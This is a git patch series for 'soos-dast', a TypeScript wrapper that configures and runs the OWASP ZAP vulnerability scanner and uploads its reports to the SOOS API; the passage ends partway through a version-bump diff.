+      help: "Enable debug logging for zap.",
+      action: "store_true",
+      required: false,
+    });
+
+    parser.add_argument("--ajaxSpider", {
+      help: "Enable Ajax Spider.",
+      action: "store_true",
+      required: false,
+    });
+
+    parser.add_argument("--contextFile", {
+      help: "Context file which will be loaded prior to scanning the target.",
+      nargs: "*",
+      required: false,
+    });
+
+    parser.add_argument("--fullScanMinutes", {
+      help: "Number of minutes for the spider to run.",
+      default: 120,
+      required: false,
+    });
+
+    parser.add_argument("--apiScanFormat", {
+      help: "Target API format, OpenAPI, SOAP or GraphQL.",
+      required: false,
+      type: (value: string) => {
+        if (Object.values(ApiScanFormat).includes(value as ApiScanFormat)) {
+          return value as ApiScanFormat;
+        } else {
+          throw new Error(`Invalid Api Scan Format: ${value}`);
+        }
+      },
+    });
+
+    parser.add_argument("--authUsername", {
+      help: "Username to use in auth apps.",
+      required: false,
+    });
+
+    parser.add_argument("--authPassword", {
+      help: "Password to use in auth apps.",
+      required: false,
+    });
+
+    parser.add_argument("--authLoginURL", {
+      help: "Login URL to use in auth apps.",
+      required: false,
+    });
+
+    parser.add_argument("--authUsernameField", {
+      help: "Username input id to use in auth apps.",
+      required: false,
+    });
+
+    parser.add_argument("--authPasswordField", {
+      help: "Password input id to use in auth apps.",
+      required: false,
+    });
+
+    parser.add_argument("--authSubmitField", {
+      help: "Submit button id to use in auth apps.",
+      required: false,
+    });
+
+    parser.add_argument("--authSecondSubmitField", {
+      help: "Second submit button id to use in auth apps.",
+      required: false,
+    });
+
+    parser.add_argument("--authSubmitAction", {
+      help: "Submit action to perform on form filled. Options: click or submit.",
+      required: false,
+      type: (value: string) => {
+        if (Object.values(SubmitActions).includes(value as SubmitActions)) {
+          return value as SubmitActions;
+        } else {
+          throw new Error(`Invalid submit action: ${value}`);
+        }
+      },
+    });
+
+    parser.add_argument("--authFormType", {
+      help: `Form type of the login URL options are: simple (all fields are displayed at once),
+             wait_for_password (Password field is displayed only after username is filled),
+             or multi_page (Password field is displayed only after username is filled and submit is clicked).`,
+      default: FormTypes.Simple,
+      required: false,
+      type: (value: string) => {
+        if (Object.values(FormTypes).includes(value as FormTypes)) {
+          return value as FormTypes;
+        } else {
+          throw new Error(`Invalid submit action: ${value}`);
+        }
+      },
+    });
+
+    parser.add_argument("--authVerificationURL", {
+      help: "URL used to verify authentication success. If authentication fails when this URL is provided, the scan will be terminated.",
+      required: false,
+    });
+
+    parser.add_argument("--authDelayTime", {
+      help: "Delay time in seconds to wait for the page to load after performing actions in the form. (Used only on authFormType: wait_for_password and multi_page)",
+      default: AUTH_DELAY_TIME,
+      required: false,
+    });
+
+    parser.add_argument("--requestCookies", {
+      help: "Set Cookie values for the requests to the target URL",
+      nargs: "*",
+      required: false,
+    });
+
+    parser.add_argument("--requestHeaders", {
+      help: "Set extra headers for the requests to the target URL",
+      nargs: "*",
+      required: false,
+    });
+
+    parser.add_argument("--onFailure", {
+      help: "Action to perform when the scan fails. Options: fail_the_build, continue_on_failure.",
+      default: OnFailure.Continue,
+      required: false,
+      type: (value: string) => {
+        if (Object.values(OnFailure).includes(value as OnFailure)) {
+          return value as OnFailure;
+        } else {
+          throw new Error(`Invalid submit action: ${value}`);
+        }
+      },
+    });
+
+    parser.add_argument("--outputFormat", {
+      help: "Output format for vulnerabilities: only the value SARIF is available at the moment",
+      required: false,
+      type: (value: string) => {
+        if (value in OutputFormat) {
+          return OutputFormat[value as keyof typeof OutputFormat];
+        } else {
+          throw new Error(`Invalid output format: ${value}`);
+        }
+      },
+    });
+
+    parser.add_argument("--checkoutDir", {
+      help: "Directory where the SARIF file will be created, used by Github Actions.",
+      required: false,
+      nargs: "*",
+    });
+
+    parser.add_argument("--reportRequestHeaders", {
+      help: "Include request/response headers data in report.",
+      default: true,
+      required: false,
+    });
+
+    parser.add_argument("--bearerToken", {
+      help: "Bearer token, adds a Authentication header with the token value.",
+      required: false,
+    });
+
+    parser.add_argument("--oauthTokenUrl", {
+      help: "The authentication URL to use to obtain an OAuth token.",
+      required: false,
+    });
+
+    parser.add_argument("--oauthParameters", {
+      help: 'Parameters to be added to the oauth token request. (eg --oauthParameters="client_id:clientID, client_secret:clientSecret, grant_type:client_credentials")',
+      required: false,
+      nargs: "*",
+    });
+
+    parser.add_argument("--updateAddons", {
+      help: "Internal use only. Update ZAP addons.",
+      action: "store_true",
+      required: false,
+    });
+
+    parser.add_argument("--disableRules", {
+      help: "Comma separated list of ZAP rules IDs to disable. List for reference https://www.zaproxy.org/docs/alerts/",
+      required: false,
+      nargs: "*",
+    });
+
+    parser.add_argument("--otherOptions", {
+      help: "Other Options to pass to zap.",
+      required: false,
+    });
+
+    parser.add_argument("--apiURL", {
+      help: "SOOS API URL - Intended for internal use only, do not modify.",
+      default: "https://api.soos.io/api/",
+      required: false,
+    });
+
+    parser.add_argument("--logLevel", {
+      help: "Minimum level to show logs: PASS, IGNORE, INFO, WARN or FAIL.",
+      default: LogLevel.INFO,
+      required: false,
+      type: (value: string) => {
+        if (value in LogLevel) {
+          return LogLevel[value as keyof typeof LogLevel];
+        } else {
+          throw new Error(`Invalid log level: ${value}`);
+        }
+      },
+    });
+
+    parser.add_argument("--integrationName", {
+      help: "Integration Name - Intended for internal use only.",
+      required: false,
+    });
+
+    parser.add_argument("--integrationType", {
+      help: "Integration Type - Intended for internal use only.",
+      required: false,
+    });
+
+    parser.add_argument("--scriptVersion", {
+      help: "Script Version - Intended for internal use only.",
+      required: false,
+    });
+
+    parser.add_argument("--appVersion", {
+      help: "App Version - Intended for internal use only.",
+      required: false,
+    });
+
+    parser.add_argument("--commitHash", {
+      help: "The commit hash value from the SCM System.",
+      default: null,
+      required: false,
+    });
+
+    parser.add_argument("--branchName", {
+      help: "The name of the branch from the SCM System.",
+      default: null,
+      required: false,
+    });
+
+    parser.add_argument("--branchURI", {
+      help: "The URI to the branch from the SCM System.",
+      default: null,
+      required: false,
+    });
+
+    parser.add_argument("--buildVersion", {
+      help: "Version of application build artifacts.",
+      default: null,
+      required: false,
+    });
+
+    parser.add_argument("--buildURI", {
+      help: "URI to CI build info.",
+      default: null,
+      required: false,
+    });
+
+    parser.add_argument("--operatingEnvironment", {
+      help: "Set Operating environment for information purposes only.",
+      default: null,
+      required: false,
+    });
+
+    parser.add_argument("--verbose", {
+      help: "Enable verbose logging.",
+      action: "store_true",
+      required: false,
+    });
+
+    logger.info("Parsing arguments");
+    return parser.parse_args();
+  }
+
+  async runAnalysis(): Promise<void> {
+    let projectHash: string | undefined;
+    let branchHash: string | undefined;
+    let analysisId: string | undefined;
+    const soosApiClient = new SOOSAnalysisApiClient(this.args.apiKey, this.args.apiURL);
+    try {
+      logger.info("Starting SOOS DAST Analysis");
+      logger.info(`Creating scan for project ${this.args.projectName}...`);
+      const result = await soosApiClient.createScan({
+        clientId: this.args.clientId,
+        projectName: this.args.projectName,
+        commitHash: this.args.commitHash,
+        branch: this.args.branchName,
+        buildVersion: this.args.buildVersion,
+        buildUri: this.args.buildUri,
+        branchUri: this.args.branchUri,
+        integrationType: this.args.integrationType,
+        operatingEnvironment: this.args.operatingEnvironment,
+        integrationName: this.args.integrationName,
+        appVersion: this.args.appVersion,
+        scriptVersion: null,
+        contributingDeveloperAudit: undefined,
+        scanType: ScanType.DAST,
+        toolName: DAST_TOOL,
+        toolVersion: DAST_TOOL_VERSION,
+      });
+      projectHash = result.projectHash;
+      branchHash = result.branchHash;
+      analysisId = result.analysisId;
+
+      global.logger.info(`Checking if url '${this.args.targetURL}' is available...`);
+      if (!(await isUrlAvailable(this.args.targetURL))) {
+        logger.error(`The URL ${this.args.targetURL} is not available.`);
+        exit(1);
+      }
+
+      execSync("mkdir -p ~/.ZAP/reports /root/.ZAP/reports");
+
+      if (this.args.reportRequestHeaders) {
+        execSync("cp -R /zap/reports/traditional-json-headers ~/.ZAP/reports/traditional-json");
+        execSync("cp -R /zap/reports/traditional-json-headers /root/.ZAP/reports/traditional-json");
+      } else {
+        execSync("cp -R /zap/reports/traditional-json ~/.ZAP/reports/traditional-json");
+        execSync("cp -R /zap/reports/traditional-json /root/.ZAP/reports/traditional-json");
+      }
+
+      const zapCommandGenerator = new ZapCommandGenerator(this.args);
+      const command = zapCommandGenerator.runCommandGeneration(this.args.scanMode);
+      logger.info(`Running command: ${command}`);
+      await SOOSDASTAnalysis.runZap(command);
+      const runSuccess = fs.existsSync(REPORT_SCAN_RESULT_FILE);
+      logger.info(`Scan finished with success: ${runSuccess}`);
+
+      const discoveredUrls =
+        fs.existsSync(SPIDERED_URLS_FILE_PATH) && fs.statSync(SPIDERED_URLS_FILE_PATH).isFile()
+          ? fs
+              .readFileSync(SPIDERED_URLS_FILE_PATH, "utf-8")
+              .split("\n")
+              .filter((url) => url.trim() !== "")
+          : [];
+
+      const data = JSON.parse(fs.readFileSync(REPORT_SCAN_RESULT_FILE, "utf-8"));
+      data["discoveredUrls"] = discoveredUrls;
+      fs.writeFileSync(REPORT_SCAN_RESULT_FILE, JSON.stringify(data, null, 4));
+      const formData = new FormData();
+
+      formData.append("resultVersion", data["@version"]);
+      formData.append(
+        "file",
+        convertStringToB64(
+          JSON.stringify(JSON.parse(fs.readFileSync(REPORT_SCAN_RESULT_FILE, "utf-8")))
+        ),
+        "base64Manifest"
+      );
+      logger.info(`Uploading scan result for project ${this.args.projectName}...`);
+      await soosApiClient.uploadScanToolResult({
+        clientId: this.args.clientId,
+        projectHash,
+        branchHash,
+        scanType: ScanType.DAST,
+        scanId: analysisId,
+        resultFile: formData,
+      });
+
+      if (this.args.outputFormat !== undefined) {
+        logger.info(`Generating SARIF report  ${this.args.projectName}...`);
+        const output = await soosApiClient.getFormattedScanResult({
+          clientId: this.args.clientId,
+          projectHash,
+          branchHash,
+          scanType: ScanType.DAST,
+          scanId: analysisId,
+          outputFormat: this.args.outputFormat,
+        });
+        if (output) {
+          logger.info(`Output ('${this.args.outputFormat}' format):`);
+          logger.info(JSON.stringify(output, null, 2));
+        }
+      }
+    } catch (error) {
+      if (projectHash && branchHash && analysisId)
+        await soosApiClient.updateScanStatus({
+          clientId: this.args.clientId,
+          projectHash,
+          branchHash,
+          scanType: ScanType.DAST,
+          scanId: analysisId,
+          status: ScanStatus.Error,
+          message: `Error while performing scan.`,
+        });
+      logger.error(error);
+      exit(1);
+    }
+  }
+
+  static async runZap(command: string): Promise<void> {
+    return new Promise((resolve, reject) => {
+      console.log("Running ZAP");
+      const zapProcess = spawn(command, {
+        shell: true,
+        stdio: "inherit",
+      });
+
+      zapProcess.on("close", (code) => {
+        if (code === 0 || code === 2) {
+          resolve();
+        } else {
+          reject(`ZAP Process: child process exited with code ${code}`);
+        }
+      });
+    });
+  }
+
+  static async createAndRun(): Promise<void> {
+    global.logger = new Logger();
+    try {
+      const args = this.parseArgs();
+      global.logger.setMinLogLevel(args.logLevel);
+      global.logger.setVerbose(args.verbose);
+      soosLogger.setMinLogLevel(args.logLevel);
+      soosLogger.setVerbose(args.verbose);
+      const soosDASTAnalysis = new SOOSDASTAnalysis(args);
+      await soosDASTAnalysis.runAnalysis();
+    } catch (error) {
+      logger.error(`Error on createAndRun: ${error}`);
+      exit(1);
+    }
+  }
+}
+
+SOOSDASTAnalysis.createAndRun();
diff --git a/reports/traditional-json-headers/report.json b/src/reports/traditional-json-headers/report.json
similarity index 100%
rename from reports/traditional-json-headers/report.json
rename to src/reports/traditional-json-headers/report.json
diff --git a/reports/traditional-json-headers/template.yaml b/src/reports/traditional-json-headers/template.yaml
similarity index 100%
rename from reports/traditional-json-headers/template.yaml
rename to src/reports/traditional-json-headers/template.yaml
diff --git a/reports/traditional-json/report.json b/src/reports/traditional-json/report.json
similarity index 100%
rename from reports/traditional-json/report.json
rename to src/reports/traditional-json/report.json
diff --git a/reports/traditional-json/template.yaml b/src/reports/traditional-json/template.yaml
similarity index 100%
rename from reports/traditional-json/template.yaml
rename to src/reports/traditional-json/template.yaml
diff --git a/src/utils/Logger.ts b/src/utils/Logger.ts
new file mode 100644
index 0000000..13e89b2
--- /dev/null
+++ b/src/utils/Logger.ts
@@ -0,0 +1,94 @@
+import { LogLevel } from "./enums";
+
+export class Logger {
+  private verbose: boolean;
+  private console: Console;
+  private minLogLevel: LogLevel;
+
+  constructor(
+    verbose: boolean = false,
+    minLogLevel: LogLevel = LogLevel.INFO,
+    console: Console = global.console
+  ) {
+    this.verbose = verbose;
+    this.console = console;
+    this.minLogLevel = minLogLevel;
+  }
+
+  private getTimeStamp(): string {
+    const now = new Date();
+    const year = now.getFullYear();
+    const month = (now.getMonth() + 1).toString().padStart(2, "0");
+    const day = now.getDate().toString().padStart(2, "0");
+    const hours = now.getHours() % 12 || 12; // Convert to 12-hour format
+    const ampm = now.getHours() >= 12 ? "PM" : "AM";
+    const minutes = now.getMinutes().toString().padStart(2, "0");
+    const seconds = now.getSeconds().toString().padStart(2, "0");
+
+    const timestamp = `${year}-${month}-${day} ${hours}:${minutes}:${seconds} ${ampm}`;
+
+    return `${timestamp}`;
+  }
+
+  private logWithTimestamp(level: LogLevel, message?: any, ...optionalParams: any[]): void {
+    if (level >= this.minLogLevel) {
+      const logLevelkey = LogLevel[level];
+      const timestamp = this.getTimeStamp();
+      const logMessage = `${timestamp} UTC [${logLevelkey}] ${message}`;
+      this.console.log(logMessage, ...optionalParams);
+    }
+  }
+
+  setVerbose(verbose: boolean) {
+    this.verbose = verbose;
+  }
+
+  setMinLogLevel(minLogLevel: LogLevel) {
+    this.minLogLevel = minLogLevel;
+  }
+
+  info(message?: any, ...optionalParams: any[]): void {
+    this.logWithTimestamp(LogLevel.INFO, message, ...optionalParams);
+  }
+
+  debug(message?: any, ...optionalParams: any[]): void {
+    this.logWithTimestamp(LogLevel.DEBUG, message, ...optionalParams);
+  }
+
+  warn(message?: any, ...optionalParams: any[]): void {
+    this.logWithTimestamp(LogLevel.WARN, message, ...optionalParams);
+  }
+
+  error(message?: any, ...optionalParams: any[]): void {
+    this.logWithTimestamp(LogLevel.ERROR, message, ...optionalParams);
+  }
+
+  verboseInfo(message?: any, ...optionalParams: any[]): void {
+    if (this.verbose) {
+      this.info(message, ...optionalParams);
+    }
+  }
+
+  verboseDebug(message?: any, ...optionalParams: any[]): void {
+    if (this.verbose) {
+      this.debug(message, ...optionalParams);
+    }
+  }
+
+  verboseWarn(message?: any, ...optionalParams: any[]): void {
+    if (this.verbose) {
+      this.warn(message, ...optionalParams);
+    }
+  }
+
+  verboseError(message?: any, ...optionalParams: any[]): void {
+    if (this.verbose) {
+      this.error(message, ...optionalParams);
+    }
+  }
+
+  logLineSeparator(): void {
+    const separator = "-".repeat(80);
+    this.console.log(separator);
+  }
+}
diff --git a/src/utils/ZapCommandGenerator.ts b/src/utils/ZapCommandGenerator.ts
new file mode 100644
index 0000000..d08f6bb
--- /dev/null
+++ b/src/utils/ZapCommandGenerator.ts
@@ -0,0 +1,99 @@
+import { SOOSDASTAnalysisArgs } from "..";
+import {
+  API_SCAN_SCRIPT,
+  BASE_LINE_SCRIPT,
+  FULL_SCAN_SCRIPT,
+  PY_CMD,
+  REPORT_SCAN_RESULT_FILENAME,
+  ZAP_AJAX_SPIDER_OPTION,
+  ZAP_CONTEXT_FILE_OPTION,
+  ZAP_CUSTOM_HOOK_SCRIPT,
+  ZAP_DEBUG_OPTION,
+  ZAP_FORMAT_OPTION,
+  ZAP_HOOK_OPTION,
+  ZAP_JSON_REPORT_OPTION,
+  ZAP_OPTIONS,
+  ZAP_SPIDER_MINUTES_OPTION,
+  ZAP_TARGET_URL_OPTION,
+} from "./constants";
+import { ScanMode } from "./enums";
+
+export class ZapCommandGenerator {
+  constructor(private config: SOOSDASTAnalysisArgs) {}
+
+  private addOption(args: string[], option: string, value?: string | number | boolean) {
+    if (value) {
+      args.push(option);
+      if (typeof value !== "boolean") args.push(value.toString());
+    }
+  }
+
+  private addEnvironmentVariable(name: string, value: any) {
+    if (value !== undefined) {
+      process.env[name] = String(value);
+    }
+  }
+
+  private addHookParams() {
+    this.addEnvironmentVariable("AUTH_LOGIN_URL", this.config.authLoginURL);
+    this.addEnvironmentVariable("AUTH_USERNAME", this.config.authUsername);
+    this.addEnvironmentVariable("AUTH_PASSWORD", this.config.authPassword);
+    this.addEnvironmentVariable("CUSTOM_COOKIES", this.config.requestCookies);
+    this.addEnvironmentVariable("CUSTOM_HEADER", this.config.requestHeaders);
+    this.addEnvironmentVariable("AUTH_BEARER_TOKEN", this.config.bearerToken);
+    this.addEnvironmentVariable("AUTH_SUBMIT_FIELD", this.config.authSubmitField);
+    this.addEnvironmentVariable("AUTH_SECOND_SUBMIT_FIELD", this.config.authSecondSubmitField);
+    this.addEnvironmentVariable("AUTH_SUBMIT_ACTION", this.config.authSubmitAction);
+    this.addEnvironmentVariable("AUTH_FORM_TYPE", this.config.authFormType);
+    this.addEnvironmentVariable("AUTH_DELAY_TIME", this.config.authDelayTime);
+    this.addEnvironmentVariable("AUTH_VERIFICATION_URL", this.config.authVerificationURL);
+    this.addEnvironmentVariable("AUTH_USERNAME_FIELD", this.config.authUsernameField);
+    this.addEnvironmentVariable("AUTH_PASSWORD_FIELD", this.config.authPasswordField);
+    this.addEnvironmentVariable("OAUTH_TOKEN_URL", this.config.oauthTokenUrl);
+    this.addEnvironmentVariable("OAUTH_PARAMETERS", this.config.oauthParameters);
+    this.addEnvironmentVariable("DISABLE_RULES", this.config.disableRules);
+  }
+
+  private generateCommand(args: string[]): string {
+    this.addOption(args, ZAP_TARGET_URL_OPTION, this.config.targetURL);
+    this.addOption(args, ZAP_CONTEXT_FILE_OPTION, this.config.contextFile);
+    this.addOption(args, ZAP_DEBUG_OPTION, this.config.debug);
+    this.addOption(args, ZAP_AJAX_SPIDER_OPTION, this.config.ajaxSpider);
+    this.addOption(args, ZAP_SPIDER_MINUTES_OPTION, this.config.fullScanMinutes);
+    this.addOption(args, ZAP_JSON_REPORT_OPTION, REPORT_SCAN_RESULT_FILENAME);
+    this.addOption(args, ZAP_OPTIONS, this.config.otherOptions);
+    this.addOption(args, ZAP_HOOK_OPTION, ZAP_CUSTOM_HOOK_SCRIPT);
+    this.addHookParams();
+
+    return args.join(" ");
+  }
+
+  private baselineScan(): string {
+    const args = [PY_CMD, BASE_LINE_SCRIPT];
+    return this.generateCommand(args);
+  }
+
+  private fullScan(): string {
+    const args = [PY_CMD, FULL_SCAN_SCRIPT];
+    this.addOption(args, ZAP_TARGET_URL_OPTION, this.config.targetURL);
+    return this.generateCommand(args);
+  }
+
+  private apiScan(): string {
+    const args = [PY_CMD, API_SCAN_SCRIPT];
+    this.addOption(args, ZAP_TARGET_URL_OPTION, this.config.targetURL);
+    this.addOption(args, ZAP_FORMAT_OPTION, this.config.apiScanFormat);
+    return this.generateCommand(args);
+  }
+
+  public runCommandGeneration(mode: ScanMode): string {
+    switch (mode) {
+      case ScanMode.Baseline:
+        return this.baselineScan();
+      case ScanMode.FullScan:
+        return this.fullScan();
+      case ScanMode.ApiScan:
+        return this.apiScan();
+    }
+  }
+}
diff --git a/src/utils/constants.ts b/src/utils/constants.ts
new file mode 100644
index 0000000..b0ad7f2
--- /dev/null
+++ b/src/utils/constants.ts
@@ -0,0 +1,30 @@
+export const FILE_ENCODING = "utf8";
+export const SOOS_API_KEY_ENV_VAR = "SOOS_API_KEY";
+export const SOOS_CLIENT_ID_ENV_VAR = "SOOS_CLIENT_ID";
+export const AUTH_DELAY_TIME = 5;
+export const SARIF_FILE = "results.sarif";
+
+// ZAP related constants
+export const PY_CMD = "python3";
+export const BASE_LINE_SCRIPT = "/zap/zap-baseline.py";
+export const FULL_SCAN_SCRIPT = "/zap/zap-full-scan.py";
+export const API_SCAN_SCRIPT = "/zap/zap-api-scan.py";
+export const CONFIG_FILE_FOLDER = "/zap/config/";
+export const ZAP_TARGET_URL_OPTION = "-t";
+export const ZAP_RULES_FILE_OPTION = "-c";
+export const ZAP_CONTEXT_FILE_OPTION = "-n";
+export const ZAP_SPIDER_MINUTES_OPTION = "-m";
+export const ZAP_DEBUG_OPTION = "-d";
+export const ZAP_AJAX_SPIDER_OPTION = "-j";
+export const ZAP_FORMAT_OPTION = "-f";
+export const ZAP_JSON_REPORT_OPTION = "-J";
+export const ZAP_OPTIONS = "-z";
+export const ZAP_HOOK_OPTION = "--hook";
+export const ZAP_ACTIVE_SCAN_POLICY_NAME = "Default Policy";
+export const ZAP_HTTP_SENDER_SCRIPTS_FOLDER_PATH = "/home/zap/.ZAP/scripts/scripts/httpsender/";
+export const REPORT_SCAN_RESULT_FILENAME = "report.json";
+export const REPORT_SCAN_RESULT_FILE = `/zap/wrk/${REPORT_SCAN_RESULT_FILENAME}`;
+export const ZAP_CUSTOM_HOOK_SCRIPT = "src/hooks/soos_zap_hook.py";
+export const SPIDERED_URLS_FILE_PATH = "./spidered_urls.txt";
+export const DAST_TOOL = "zap";
+export const DAST_TOOL_VERSION = "2.12";
diff --git a/src/utils/enums.ts b/src/utils/enums.ts
new file mode 100644
index 0000000..4007b07
--- /dev/null
+++ b/src/utils/enums.ts
@@ -0,0 +1,47 @@
+export enum ScanMode {
+  Baseline = "baseline",
+  FullScan = "fullscan",
+  ApiScan = "apiscan",
+}
+
+export enum ApiScanFormat {
+  OpenAPI = "OpenAPI",
+  SOAP = "SOAP",
+  GraphQL = "GraphQL",
+}
+
+export enum LogLevel {
+  PASS = 0,
+  IGNORE = 1,
+  INFO = 2,
+  WARN = 3,
+  FAIL = 4,
+  DEBUG = 5,
+  ERROR = 6,
+}
+
+export enum OutputFormat {
+  SARIF = "SARIF",
+}
+
+export enum SubmitActions {
+  Submit = "submit",
+  Click = "click",
+}
+
+export enum FormTypes {
+  Simple = "simple",
+  WaitForPassword = "wait_for_password",
+  MultiPage = "multi_page",
+}
+
+export enum OnFailure {
+  Continue = "continue_on_failure",
+  Fail = "fail_the_build",
+}
+
+export const ScanModeScripts: Record<ScanMode, string> = {
+  [ScanMode.Baseline]: "/zap/zap-baseline.py",
+  [ScanMode.FullScan]: "/zap/zap-full-scan.py",
+  [ScanMode.ApiScan]: "/zap/zap-api-scan.py",
+};
diff --git a/src/utils/utilities.ts b/src/utils/utilities.ts
new file mode 100644
index 0000000..187e75a
--- /dev/null
+++ b/src/utils/utilities.ts
@@ -0,0 +1,109 @@
+import axios, { AxiosError } from "axios";
+
+export function isNil(value: unknown): value is null | undefined {
+  return value === null || value === undefined;
+}
+export function convertStringToB64(content: string): string {
+  const messageBytes = Buffer.from(content, "utf-8");
+  const base64Message = messageBytes.toString("base64");
+  return base64Message;
+}
+
+export function delay(ms: number) {
+  return new Promise((resolve) => setTimeout(resolve, ms));
+}
+
+export const removeDuplicates = <T>(list: Array<T>): Array<T> => [...new Set(list)];
+
+export const ensureValue = <T>(value: T | null | undefined, propertyName: string): T => {
+  if (isNil(value)) throw new Error(`'${propertyName}' is required for script execution.`);
+  return value;
+};
+
+export const ensureValueIsOneOf = <T extends string>(
+  options: Array<T>,
+  value: string | undefined,
+  opts: { caseSensitive?: boolean } = {}
+): T | undefined => {
+  if (value === undefined) return undefined;
+  const match = options.find((option) => {
+    return opts.caseSensitive
+      ? option === value
+      : option.toLocaleLowerCase() === value.toLocaleLowerCase();
+  });
+  if (!isNil(match)) return match;
+  throw new Error(`Invalid enum value '${value}'. Valid options are: ${options.join(", ")}.`);
+};
+
+export const ensureEnumValue = <
+  T extends string,
+  TEnumObject extends Record<string, T> = Record<string, T>
+>(
+  enumObject: TEnumObject,
+  value: string | undefined
+): T | undefined => {
+  return ensureValueIsOneOf(Object.values(enumObject), value);
+};
+
+/*
+Reference: https://stackoverflow.com/a/18650828
+*/
+export function formatBytes(bytes: number, decimals = 2) {
+  if (bytes === 0) return "0 Bytes";
+
+  const kilobyte = 1024;
+  const fractionalDigits = decimals < 0 ? 0 : decimals;
+  const sizes = ["Bytes", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB"];
+
+  const exponentialValue = Math.floor(Math.log(bytes) / Math.log(kilobyte));
+  const count = Number.parseFloat(
+    (bytes / Math.pow(kilobyte, exponentialValue)).toFixed(fractionalDigits)
+  );
+  const unit = sizes[exponentialValue];
+  return `${count} ${unit}`;
+}
+
+export const obfuscateProperties = <T extends Record<string, unknown> = Record<string, unknown>>(
+  dictionary: T,
+  properties: Array<keyof T>,
+  replacement = "*********"
+) => {
+  return Object.entries(dictionary).reduce<T>((accumulator, [key, value]) => {
+    return {
+      ...accumulator,
+      [key]: properties.includes(key) ? replacement : value,
+    };
+  }, {} as T);
+};
+
+export const getEnvVariable = (name: string): string | null => {
+  return process.env[name] || null;
+};
+
+export const sleep = (ms: number) => new Promise((resolve) => setTimeout(resolve, ms));
+
+export const isUrlAvailable = async (url: string): Promise<boolean> => {
+  let delay = 5000;
+  let maxAttempts = 5;
+  let attempts = 0;
+  while (attempts < maxAttempts) {
+    try {
+      logger.info(`Attempt ${attempts + 1} of ${maxAttempts}...`);
+      const response = await axios.get(url);
+      if (response.status >= 200 && response.status < 300) {
+        return true;
+      }
+    } catch (error) {
+      if (error instanceof AxiosError) {
+        logger.info(error);
+        if (error.response && error.response.status < 500) {
+          return true;
+        }
+      }
+      attempts++;
+      if (attempts < maxAttempts) await sleep(delay);
+    }
+  }
+
+  return false;
+};
diff --git a/tests/tests.py b/tests/tests.py
deleted file mode 100644
index a1e8f63..0000000
--- a/tests/tests.py
+++ /dev/null
@@ -1,42 +0,0 @@
-import os
-import subprocess
-import unittest
-
-SCAN_COMMAND = ["python3", "main.py"]
-SOOS_CLIENT_ID_DEV = ""
-SOOS_API_KEY_DEV = ""
-DEV_ENV = "https://dev-api.soos.io/api/"
-
-
-class BaseLineTestCases(unittest.TestCase):
-    def test_baseline_scan_dev(self):
-        print('Testing Baseline Scan')
-        PARAMS = [
-            f"--clientId={SOOS_CLIENT_ID_DEV}",
-            f"--apiKey={SOOS_API_KEY_DEV}",
-            "--projectName=\"SOOS DAST Integration Test\"",
-            f"--apiURL={DEV_ENV}",
-            "--branchName=\"Broken Crystals\""
-            "--ajaxSpider=True",
-            "https://brokencrystals.com/"
-        ]
-        process = subprocess.run(SCAN_COMMAND + PARAMS, capture_output=True,
-                                 text=True)
-        print(process.stdout)
-        self.assertEqual(process.returncode, 0)
-
-    def test_baseline_scan_dev_error(self):
-        print('Testing Baseline Scan')
-        PARAMS = [
-            f"--clientId={SOOS_CLIENT_ID_DEV}",
-            f"--apiKey={SOOS_API_KEY_DEV}",
-            "--projectName=\"SOOS DAST Integration Test\"",
-            f"--apiURL={DEV_ENV}",
-            "--branchName=\"Broken Crystals\""
-            "--ajaxSpider=True",
-            "https://no-exist.soos.io/"
-        ]
-        process = subprocess.run(SCAN_COMMAND + PARAMS, capture_output=True,
-                                 text=True)
-        print(process.stdout)
-        self.assertEqual(process.returncode, 1)
diff --git a/tsconfig.json b/tsconfig.json
new file mode 100644
index 0000000..09dafcd
--- /dev/null
+++ b/tsconfig.json
@@ -0,0 +1,19 @@
+/* Visit https://aka.ms/tsconfig.json to read more about this file */
+{
+  "compilerOptions": {
+    "target": "ES2015", /* Specify ECMAScript target version: 'ES3' (default), 'ES5', 'ES2015', 'ES2016', 'ES2017', 'ES2018', 'ES2019', 'ES2020', or 'ESNEXT'. */
+    "module": "commonjs", /* Specify module code generation: 'none', 'commonjs', 'amd', 'system', 'umd', 'es2015', 'es2020', or 'ESNext'. */
+    "outDir": "./dist",                        /* Redirect output structure to the directory. */
+    "rootDir": "./src",                       /* Specify the root directory of input files. Use to control the output directory structure with --outDir. */
+    "removeComments": true,                /* Do not emit comments to output. */
+    "importHelpers": true,                 /* Import emit helpers from 'tslib'. */
+    "strict": true, /* Enable all strict type-checking options. */
+    "noUnusedLocals": true,                /* Report errors on unused locals. */
+    "noUnusedParameters": true,            /* Report errors on unused parameters. */
+    "noImplicitReturns": true,             /* Report error when not all code paths in function return a value. */
+    "noFallthroughCasesInSwitch": true,    /* Report errors for fallthrough cases in switch statement. */
+    "esModuleInterop": true, /* Enables emit interoperability between CommonJS and ES Modules via creation of namespace objects for all imports. Implies 'allowSyntheticDefaultImports'. */
+    "skipLibCheck": false, /* Skip type checking of declaration files. */
+    "forceConsistentCasingInFileNames": true /* Disallow inconsistently-cased references to the same file. */
+  }
+}
\ No newline at end of file

From 112c32b5c2384cebca745d8a060c0f913136e981 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Mon, 6 Nov 2023 09:24:34 -0300
Subject: [PATCH 02/26] partial code review

---
 VERSION.txt                      |   2 +-
 package-lock.json                |  12 ++--
 package.json                     |   4 +-
 src/env.d.ts                     |   7 --
 src/index.ts                     |  52 +++++++--------
 src/utils/Logger.ts              |  94 --------------------------
 src/utils/ZapCommandGenerator.ts |  99 ----------------------------
 src/utils/constants.ts           |   1 -
 src/utils/enums.ts               |  14 ----
 src/utils/utilities.ts           | 109 -------------------------------
 10 files changed, 31 insertions(+), 363 deletions(-)
 delete mode 100644 src/env.d.ts
 delete mode 100644 src/utils/Logger.ts
 delete mode 100644 src/utils/ZapCommandGenerator.ts
 delete mode 100644 src/utils/utilities.ts

diff --git a/VERSION.txt b/VERSION.txt
index e8eb7f1..227cea2 100644
--- a/VERSION.txt
+++ b/VERSION.txt
@@ -1 +1 @@
-1.0.33
+2.0.0
diff --git a/package-lock.json b/package-lock.json
index 2cb3c24..d4fe25c 100644
--- a/package-lock.json
+++ b/package-lock.json
@@ -1,15 +1,15 @@
 {
   "name": "soos-dast",
-  "version": "1.0.0",
+  "version": "2.0.0",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "soos-dast",
-      "version": "1.0.0",
+      "version": "2.0.0",
       "license": "MIT",
       "dependencies": {
-        "@soos-io/api-client": "0.1.5-pre.3",
